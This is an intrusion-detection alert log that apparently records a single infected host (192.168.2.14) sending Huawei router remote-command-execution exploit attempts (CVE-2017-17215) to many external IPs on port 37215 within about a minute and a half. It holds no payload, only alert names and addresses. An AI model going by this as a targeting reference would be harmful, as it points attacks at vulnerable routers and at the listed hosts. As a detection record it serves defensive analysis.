                                                    07/10/24-08:27:27.112461TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3835037215192.168.2.14197.55.237.162
                                                    07/10/24-08:26:18.011354TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6044237215192.168.2.14155.22.74.61
                                                    07/10/24-08:26:33.254680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5294037215192.168.2.14197.199.56.123
                                                    07/10/24-08:27:32.489604TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4330237215192.168.2.1448.187.224.215
                                                    07/10/24-08:26:20.108378TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5506037215192.168.2.14197.11.124.60
                                                    07/10/24-08:26:57.684476TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5130437215192.168.2.14157.183.211.170
                                                    07/10/24-08:27:31.530342TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4978637215192.168.2.14197.253.89.28
                                                    07/10/24-08:26:20.150804TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5146237215192.168.2.1441.91.241.119
                                                    07/10/24-08:26:25.505039TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5993037215192.168.2.14157.237.4.28
                                                    07/10/24-08:27:14.853169TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4662837215192.168.2.14197.215.10.206
                                                    07/10/24-08:27:11.475374TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4691837215192.168.2.1441.166.218.195
                                                    07/10/24-08:26:13.847227TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5842837215192.168.2.1441.55.234.176
                                                    07/10/24-08:26:28.906271TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6048837215192.168.2.14157.15.16.230
                                                    07/10/24-08:26:14.819021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5862237215192.168.2.14131.33.205.1
                                                    07/10/24-08:27:10.563239TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4611637215192.168.2.1441.197.144.172
                                                    07/10/24-08:27:05.101727TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4627437215192.168.2.1463.32.82.61
                                                    07/10/24-08:27:02.876931TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3679437215192.168.2.14197.129.185.99
                                                    07/10/24-08:26:28.929759TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3280837215192.168.2.14157.167.168.94
                                                    07/10/24-08:26:26.526519TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3829637215192.168.2.14157.36.52.201
                                                    07/10/24-08:27:05.188793TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4146437215192.168.2.14197.95.178.126
                                                    07/10/24-08:27:14.865429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5783637215192.168.2.14186.88.66.20
                                                    07/10/24-08:26:47.980953TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3327037215192.168.2.14157.200.27.99
                                                    07/10/24-08:26:59.707138TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4529237215192.168.2.14197.8.100.43
                                                    07/10/24-08:27:27.077198TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5450437215192.168.2.14197.107.182.107
                                                    07/10/24-08:26:28.758809TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4666237215192.168.2.14197.121.131.254
                                                    07/10/24-08:27:23.898408TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5250837215192.168.2.14197.143.212.42
                                                    07/10/24-08:26:41.360429TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4235837215192.168.2.14197.27.94.145
                                                    07/10/24-08:26:20.164918TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5861237215192.168.2.14157.206.59.65
                                                    07/10/24-08:27:17.088792TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4072437215192.168.2.14172.206.236.74
                                                    07/10/24-08:26:23.333013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4503437215192.168.2.14197.224.165.89
                                                    07/10/24-08:26:11.130585TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5442437215192.168.2.14125.79.62.244
                                                    07/10/24-08:27:22.464589TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5893437215192.168.2.1441.10.223.41
                                                    07/10/24-08:26:20.122842TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3396237215192.168.2.14171.20.195.9
                                                    07/10/24-08:26:11.620952TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3451637215192.168.2.1441.70.197.249
                                                    07/10/24-08:26:33.257964TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5577037215192.168.2.14197.0.104.15
                                                    07/10/24-08:26:45.645798TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4672437215192.168.2.14121.127.23.76
                                                    07/10/24-08:27:02.958121TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3659837215192.168.2.14162.203.60.43
                                                    07/10/24-08:26:25.418573TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5081837215192.168.2.14157.61.238.218
                                                    07/10/24-08:26:55.397639TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5024637215192.168.2.1441.47.65.131
                                                    07/10/24-08:27:20.487738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4510237215192.168.2.14157.136.104.175
                                                    07/10/24-08:26:13.753086TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3944037215192.168.2.14157.116.198.66
                                                    07/10/24-08:26:20.168477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4862637215192.168.2.14115.58.104.34
                                                    07/10/24-08:26:23.347841TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3373237215192.168.2.14114.100.119.136
                                                    07/10/24-08:26:55.437797TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3761837215192.168.2.14118.60.108.22
                                                    07/10/24-08:27:11.489140TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3946237215192.168.2.14197.187.132.161
                                                    07/10/24-08:26:31.102674TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3965237215192.168.2.14157.225.112.93
                                                    07/10/24-08:26:42.400738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3576837215192.168.2.1481.216.99.95
                                                    07/10/24-08:27:23.903843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4572237215192.168.2.14197.180.237.50
                                                    07/10/24-08:27:27.112829TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5245037215192.168.2.14157.11.8.10
                                                    07/10/24-08:26:38.596946TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5161237215192.168.2.14197.201.226.144
                                                    07/10/24-08:27:02.796781TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819037215192.168.2.14197.212.122.223
                                                    07/10/24-08:26:59.550215TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5746237215192.168.2.1441.61.58.24
                                                    07/10/24-08:26:23.317114TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5802437215192.168.2.1441.184.129.25
                                                    07/10/24-08:26:38.558998TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3826437215192.168.2.14157.102.37.163
                                                    07/10/24-08:26:49.821091TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6032437215192.168.2.1441.165.201.178
                                                    07/10/24-08:26:28.891861TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5031837215192.168.2.14157.116.169.3
                                                    07/10/24-08:27:31.566998TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4746437215192.168.2.1464.227.228.118
                                                    07/10/24-08:27:19.157355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3662637215192.168.2.14197.227.79.229
                                                    07/10/24-08:27:10.675558TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3592837215192.168.2.1441.19.194.44
                                                    07/10/24-08:26:38.512743TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4323037215192.168.2.14157.233.225.253
                                                    07/10/24-08:26:53.178125TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3359637215192.168.2.14123.90.193.249
                                                    07/10/24-08:26:11.593269TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4299037215192.168.2.14157.113.242.221
                                                    07/10/24-08:26:52.086105TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845837215192.168.2.14208.172.123.107
                                                    07/10/24-08:26:53.164158TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5516637215192.168.2.14157.149.107.31
                                                    07/10/24-08:27:22.781993TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5011637215192.168.2.14197.6.110.208
                                                    07/10/24-08:27:23.957174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5305437215192.168.2.14197.58.115.105
                                                    07/10/24-08:26:36.412614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5071037215192.168.2.14157.202.179.192
                                                    07/10/24-08:26:13.778157TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5162037215192.168.2.14197.45.160.10
                                                    07/10/24-08:26:34.197956TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4464037215192.168.2.1441.160.198.8
                                                    07/10/24-08:27:13.878824TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5739637215192.168.2.14129.254.241.164
                                                    07/10/24-08:26:47.933243TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4729637215192.168.2.14157.244.142.185
                                                    07/10/24-08:27:32.521553TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3901837215192.168.2.1441.131.140.94
                                                    07/10/24-08:27:31.562174TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4710837215192.168.2.14197.188.37.37
                                                    07/10/24-08:27:33.880415TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3898437215192.168.2.14157.182.13.224
                                                    07/10/24-08:26:53.117247TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5159637215192.168.2.14160.192.87.180
                                                    07/10/24-08:26:38.568702TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5994637215192.168.2.14157.78.51.89
                                                    07/10/24-08:27:08.386325TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3277237215192.168.2.1441.176.239.112
                                                    07/10/24-08:27:10.558615TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3569037215192.168.2.14197.200.129.109
                                                    07/10/24-08:27:07.376738TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4673237215192.168.2.14157.152.62.241
                                                    07/10/24-08:27:10.631590TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4272237215192.168.2.14154.19.85.27
                                                    07/10/24-08:27:10.600336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3411037215192.168.2.14157.235.227.108
                                                    07/10/24-08:26:13.847228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3507637215192.168.2.1441.78.50.179
                                                    07/10/24-08:27:19.251231TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4684037215192.168.2.1448.67.183.111
                                                    07/10/24-08:26:20.171305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3846237215192.168.2.14116.218.226.69
                                                    07/10/24-08:26:23.350538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5171637215192.168.2.14197.112.18.42
                                                    07/10/24-08:26:13.788071TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5232437215192.168.2.1441.217.110.52
                                                    07/10/24-08:27:13.834773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4229837215192.168.2.14157.89.108.221
                                                    07/10/24-08:26:15.803828TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5352637215192.168.2.1459.232.84.167
                                                    07/10/24-08:27:08.385644TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864437215192.168.2.14197.113.207.152
                                                    07/10/24-08:27:31.468690TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5319837215192.168.2.1441.180.202.147
                                                    07/10/24-08:27:19.271140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3370037215192.168.2.1462.2.243.208
                                                    07/10/24-08:26:20.143490TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5631437215192.168.2.1441.109.193.11
                                                    07/10/24-08:26:49.898002TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5327437215192.168.2.14197.141.29.190
                                                    07/10/24-08:26:43.796387TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4684837215192.168.2.1466.83.29.153
                                                    07/10/24-08:26:43.931140TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5427437215192.168.2.1441.217.218.133
                                                    07/10/24-08:27:17.043908TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4924637215192.168.2.14157.86.101.177
                                                    07/10/24-08:27:19.234449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3303237215192.168.2.14197.67.101.193
                                                    07/10/24-08:26:20.189377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4790637215192.168.2.1440.5.204.216
                                                    07/10/24-08:26:42.161907TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3885637215192.168.2.14157.33.58.106
                                                    07/10/24-08:26:17.961786TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3929037215192.168.2.14157.8.228.166
                                                    07/10/24-08:26:55.385980TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3631637215192.168.2.14197.215.230.68
                                                    07/10/24-08:26:34.245285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3676037215192.168.2.14145.78.55.135
                                                    07/10/24-08:27:30.558809TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4342637215192.168.2.14197.202.22.95
                                                    07/10/24-08:27:03.035788TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4818637215192.168.2.1441.66.38.161
                                                    07/10/24-08:26:20.167079TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5239037215192.168.2.14197.114.75.121
                                                    07/10/24-08:27:28.045782TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4125037215192.168.2.14146.75.89.59
                                                    07/10/24-08:27:10.585951TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4207037215192.168.2.1441.210.6.203
                                                    07/10/24-08:26:53.177633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5752237215192.168.2.14157.241.222.142
                                                    07/10/24-08:27:30.487311TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3305237215192.168.2.1441.120.112.131
                                                    07/10/24-08:26:42.356515TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4751037215192.168.2.1445.247.152.31
                                                    07/10/24-08:27:10.558614TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4782037215192.168.2.14152.61.141.45
                                                    07/10/24-08:26:51.966896TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5479237215192.168.2.1441.216.107.230
                                                    07/10/24-08:26:11.485885TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5561837215192.168.2.14157.52.181.205
                                                    07/10/24-08:26:36.433814TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4942437215192.168.2.14197.237.149.116
                                                    07/10/24-08:26:13.645814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5260037215192.168.2.1487.206.189.34
                                                    07/10/24-08:27:14.663044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4371637215192.168.2.14156.123.191.125
                                                    07/10/24-08:26:43.537049TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4598837215192.168.2.1441.127.196.53
                                                    07/10/24-08:27:31.448205TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5763637215192.168.2.14197.2.136.151
                                                    07/10/24-08:27:10.537865TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4001237215192.168.2.1441.196.213.89
                                                    07/10/24-08:26:28.633742TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3513837215192.168.2.1441.180.120.245
                                                    07/10/24-08:26:18.037621TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3958037215192.168.2.14121.57.27.141
                                                    07/10/24-08:26:59.768994TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031237215192.168.2.14197.172.23.220
                                                    07/10/24-08:26:31.090801TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4033037215192.168.2.14157.73.146.108
                                                    07/10/24-08:26:14.769686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4644437215192.168.2.14197.137.53.72
                                                    07/10/24-08:27:23.953541TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5831037215192.168.2.1441.71.171.17
                                                    07/10/24-08:26:45.660346TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5985637215192.168.2.14197.144.10.27
                                                    07/10/24-08:27:07.380446TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3663837215192.168.2.14157.75.233.181
                                                    07/10/24-08:27:30.529525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5910637215192.168.2.14157.13.226.94
                                                    07/10/24-08:26:41.390628TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3969637215192.168.2.14197.177.171.50
                                                    07/10/24-08:26:42.343716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4907437215192.168.2.1441.138.242.127
                                                    07/10/24-08:26:47.866272TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4021237215192.168.2.14157.213.24.175
                                                    07/10/24-08:27:31.457680TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3858437215192.168.2.14194.135.200.124
                                                    07/10/24-08:26:59.638467TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3339437215192.168.2.14211.219.149.255
                                                    07/10/24-08:26:11.550470TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4744837215192.168.2.1477.76.169.184
                                                    07/10/24-08:26:53.209025TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3587837215192.168.2.14174.146.46.247
                                                    07/10/24-08:26:29.811395TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5558237215192.168.2.1441.219.213.191
                                                    07/10/24-08:26:42.169251TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3854837215192.168.2.14197.249.55.188
                                                    07/10/24-08:26:22.256236TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3745637215192.168.2.1441.92.39.222
                                                    07/10/24-08:26:31.072939TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5064637215192.168.2.14197.27.233.228
                                                    07/10/24-08:27:33.729684TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3652437215192.168.2.1441.116.3.49
                                                    07/10/24-08:26:45.607530TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3279437215192.168.2.1441.237.124.219
                                                    07/10/24-08:27:11.545525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4727837215192.168.2.14153.89.83.80
                                                    07/10/24-08:27:22.548676TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5899637215192.168.2.14197.254.91.135
                                                    07/10/24-08:26:52.022407TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3702837215192.168.2.1441.79.136.40
                                                    07/10/24-08:27:05.179057TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3655237215192.168.2.14132.113.254.255
                                                    07/10/24-08:26:42.346552TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5560837215192.168.2.1441.81.63.140
                                                    07/10/24-08:26:49.785373TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3737637215192.168.2.1441.170.241.132
                                                    07/10/24-08:26:57.612350TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4980037215192.168.2.14157.219.86.92
                                                    07/10/24-08:26:48.007312TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3797837215192.168.2.14157.185.4.66
                                                    07/10/24-08:26:57.595763TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4168237215192.168.2.14156.97.70.79
                                                    07/10/24-08:26:11.592748TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3644837215192.168.2.144.157.212.68
                                                    07/10/24-08:27:10.595631TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3286237215192.168.2.14157.209.239.72
                                                    07/10/24-08:26:11.562069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5674237215192.168.2.14157.123.65.148
                                                    07/10/24-08:27:10.609606TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4593437215192.168.2.14197.145.197.85
                                                    07/10/24-08:27:11.527474TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5024237215192.168.2.14157.243.152.158
                                                    07/10/24-08:26:31.098508TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5341837215192.168.2.1495.187.31.117
                                                    07/10/24-08:26:43.842656TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3406637215192.168.2.14157.195.128.13
                                                    07/10/24-08:26:51.994247TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5224837215192.168.2.14143.137.192.6
                                                    07/10/24-08:27:17.025929TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3903037215192.168.2.14157.202.97.142
                                                    07/10/24-08:26:22.287695TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5106037215192.168.2.14157.55.136.132
                                                    07/10/24-08:27:10.699441TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447637215192.168.2.14157.39.20.167
                                                    07/10/24-08:26:34.230716TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389637215192.168.2.1441.183.216.2
                                                    07/10/24-08:27:02.989706TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3301637215192.168.2.14157.9.14.194
                                                    07/10/24-08:26:17.972432TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3852637215192.168.2.1441.107.239.72
                                                    07/10/24-08:27:24.985938TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3690037215192.168.2.1441.98.249.213
                                                    07/10/24-08:26:29.826099TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3567437215192.168.2.14197.56.123.161
                                                    07/10/24-08:26:28.819070TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3596637215192.168.2.14197.206.206.116
                                                    07/10/24-08:26:29.868554TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3632037215192.168.2.14157.127.65.218
                                                    07/10/24-08:26:11.506758TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5165237215192.168.2.1441.211.47.10
                                                    07/10/24-08:27:23.870319TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4580037215192.168.2.14197.81.128.209
                                                    07/10/24-08:27:33.953196TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5692637215192.168.2.1493.116.178.96
                                                    07/10/24-08:26:52.037167TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5201637215192.168.2.14145.180.79.88
                                                    07/10/24-08:26:47.783932TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5337837215192.168.2.1441.185.134.168
                                                    07/10/24-08:26:14.816680TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5620837215192.168.2.1441.221.48.136
                                                    07/10/24-08:26:28.689305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4694837215192.168.2.14112.212.117.44
                                                    07/10/24-08:27:13.857509TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5304237215192.168.2.1493.2.2.48
                                                    07/10/24-08:27:20.495859TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3958237215192.168.2.1435.102.220.132
                                                    07/10/24-08:27:32.580487TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5148237215192.168.2.14157.180.246.85
                                                    07/10/24-08:26:41.369848TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3470837215192.168.2.14113.30.86.25
                                                    07/10/24-08:27:05.205582TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3468237215192.168.2.14197.240.111.218
                                                    07/10/24-08:27:19.174843TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3935037215192.168.2.14197.134.189.254
                                                    07/10/24-08:26:28.642982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4794837215192.168.2.14197.166.186.52
                                                    07/10/24-08:26:28.710871TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3740837215192.168.2.14157.166.29.220
                                                    07/10/24-08:26:31.085026TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5335837215192.168.2.1441.82.97.113
                                                    07/10/24-08:26:20.130042TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3577237215192.168.2.1441.213.214.123
                                                    07/10/24-08:27:13.914013TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5316037215192.168.2.14197.117.189.153
